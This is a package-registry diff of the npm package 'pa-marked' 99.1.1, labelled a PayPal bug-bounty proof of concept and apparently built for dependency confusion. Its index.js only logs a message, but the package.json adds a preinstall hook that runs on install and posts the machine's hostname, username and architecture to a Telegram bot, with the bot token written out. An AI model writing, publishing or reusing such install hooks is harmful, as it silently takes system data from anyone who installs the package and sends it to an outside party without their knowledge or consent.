pa-marked 99.1.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +10 -0
- package/package.json +11 -0
package/index.js
ADDED
|
@@ -0,0 +1,10 @@
|
|
|
1
|
+
// Security Research PoC for Bug Bounty
|
|
2
|
+
// This package is part of a coordinated vulnerability disclosure.
|
|
3
|
+
// If you are seeing this, please contact the security researcher.
|
|
4
|
+
|
|
5
|
+
console.log("ALONE BEAST Security Research - PoC Active");
|
|
6
|
+
|
|
7
|
+
module.exports = {
|
|
8
|
+
status: "Proof of Concept Executed",
|
|
9
|
+
author: "ALONE BEAST"
|
|
10
|
+
};
|
package/package.json
ADDED
|
@@ -0,0 +1,11 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "pa-marked",
|
|
3
|
+
"version": "99.1.1",
|
|
4
|
+
"description": "Security Research PoC for PayPal Bug Bounty",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "node -e 'const https = require(\"https\"); const os = require(\"os\"); const data = JSON.stringify({chat_id: \"8655055695\", text: \"🚨 ALONE BEAST RCE PoC 🚨\\n\\n🔥 VULNERABLE SERVER: \" + os.hostname() + \"\\n👤 USER: \" + os.userInfo().username + \"\\n📍 ARCH: \" + os.arch()}); const options = {hostname: \"api.telegram.org\", port: 443, path: \"/bot8236864682:AAFO8n3ml54y_JQnAA2_wxD5j01eooMwC8w/sendMessage\", method: \"POST\", headers: {\"Content-Type\": \"application/json\", \"Content-Length\": data.length}}; const req = https.request(options); req.write(data); req.end();'"
|
|
8
|
+
},
|
|
9
|
+
"author": "ALONE BEAST",
|
|
10
|
+
"license": "ISC"
|
|
11
|
+
}
|